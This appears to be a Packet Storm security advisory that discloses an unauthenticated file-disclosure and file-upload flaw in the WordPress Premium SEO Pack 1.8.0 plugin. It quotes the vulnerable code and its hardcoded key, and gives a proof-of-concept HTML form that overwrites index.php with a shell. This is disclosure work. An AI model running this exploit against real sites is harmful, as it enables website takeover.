exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Premium SEO Pack 1.8.0 Shell Upload / File Disclosure

WordPress Premium SEO Pack 1.8.0 Shell Upload / File Disclosure
Posted Apr 24, 2015
Authored by Evex

WordPress Premium SEO Pack plugin version 1.8.0 suffers from file disclosure and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability
SHA-256 | ac5f4c1d1a43f1db2b74fd991cc42657c14e00af6344504e6ebedd072e8cb46d

WordPress Premium SEO Pack 1.8.0 Shell Upload / File Disclosure

Change Mirror Download
Premium SEO Pack Wordpress Plugin Unauthenicated Arbitrary File Upload & LFD
Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437

This Plugin is Vulnerable to Local File Disclosure and Remote Code Execute
via Arbitrary File Upload.

Vulnerability Code(Shorted):
class abmRemoteSupport{

public function __construct(){
$this->load_config();
$this->validate_connection();
$this->triggers();
}

private function load_config(){
require_once( 'remote_init.php' );
$this->config = $aa_tunnel_config;

/* in remote_init.php
* $aa_tunnel_config = array(
* "key" => "69efc4922575861f31125878597e97cf",
* );
*/
}

private function validate_connection(){
$coming_key = isset($_REQUEST['connection_key']) ?
$_REQUEST['connection_key'] : '';
if( trim($coming_key) == "" || $coming_key != $this->config['key']
){
$this->print_error( array('code' => 101,'msg' => "Invalid
key!"), 'fatal' );
}
return true;
}

private function triggers(){
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
if( $action == 'browse_folder' )
$this->browse_folder();
if( $action == 'open_file' )
$this->open_file();
if( $action == 'save_file' )
$this->save_file();
$this->print_response();
}

private function save_file(){
$file = isset($_REQUEST['file']) ? urldecode($_REQUEST['file']) :
'';
$file_content = isset($_REQUEST['file_content']) ?
@base64_decode($_REQUEST['file_content']) : '';
if( file_exists( $file )) {
$write_file = @file_put_contents( $file, $file_content );
if( $write_file ){
$this->response = array('status' => 'valid','file_path' =>
$file,'file_type' => end( explode(".", $file ) ));
}else{
$this->response = array('status' => 'invalid','msg' =>
'Unable to write on file','file_type' => end( explode(".", $file ) ),
'file_path' => $file);
}
}
}

private function open_file()
{
$file = isset($_REQUEST['file']) ? $this->config['path'] .
$_REQUEST['file'] : '';
if( file_exists( $file ) ) {
$file_content = file_get_contents( $file );
$this->response = array(
'status' => 'valid',
'file_path' => $file,
'file_type' => end( explode(".", $file ) ),
'file_name' => end( explode("/", $file ) ),
'file_alias' => md5( $file ),
'content' => $file_content
);
}
}

new abmRemoteSupport();
Vulnerable Code End.

so as you see it using authenication! in 'validate_connection' function its
validating connection through checking the requested key with the defined
one ($this->config['key']). the pass is an md5 value
'69efc4922575861f31125878597e97cf' but when authenicating its comparing
$_REQUEST['connection_key'] with '69efc4922575861f31125878597e97cf'
Directly without encoding the requested key in md5. so it can be directly
passed by passing the original value '69efc4922575861f31125878597e97cf'.

Conclusion: 'remote_tunnel.php'?!! this looks a suspicious name though! its
confusing if the vendor did this on purpose or not, because there is
protections in other methods.

Proof of Concept:
<form action="
http://wordpress/wp-content/plugins/premium-seo-pack/modules/remote_support/remote_tunnel.php"
method="post" >
<input type="hidden" name="connection_key"
value="69efc4922575861f31125878597e97cf" >
<input name="action" value="save_file" ><br>
<input name="file" value="../../../index.php"><br>
<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
<input type="submit" ><br>
</form>

Timeline:
Discovered - March 2015
Vendor Contact - March 2015
No Reply - April 2015
Public Disclosure - April 2015

@Evex_1337
http://research.evex.pw/?vuln=12
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close